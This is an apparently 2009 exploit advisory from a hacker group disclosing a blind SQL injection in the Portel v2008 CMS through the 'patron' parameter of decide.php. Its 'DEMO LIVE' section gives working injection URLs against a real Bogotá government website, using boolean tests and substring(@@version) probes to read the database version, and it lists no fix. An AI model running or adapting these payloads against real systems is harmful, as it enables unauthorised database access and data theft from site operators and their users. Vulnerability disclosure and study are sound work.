Portel v2008 (decide.php patron) Blind SQL Injection Vulnerability

2009-08-05 22:34:57

------------------------------------------------------------------------------
Portel (patron) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


#####################################################
# [+] Author : Chip D3 Bi0s #
# [+] Email : chipdebios[alt+64]gmail.com #
# [+] Vulnerability : Blind SQL injection #
# [+] Group : LatinHackTeam #
#####################################################

**********************************************************************
Info Cms:
* Name : Portel
* Web : http://www.porteleditor.com
* dowloand : http://www.porteleditor.com/instalacion/portelv2008.zip
http://rapidshare.com/files/263383411/portelv2008.zip.html
* Country : Colombia

**********************************************************************


Example:
http://localHost/path/libreria/php/decide.php?patron=n<Blind Sql Code>
n = patron valid


DEMO LIVE:

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/*
true

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=4/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=5/*
true


etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

#

Fixes

No fixes

In order to submit a new fix you need to be registered.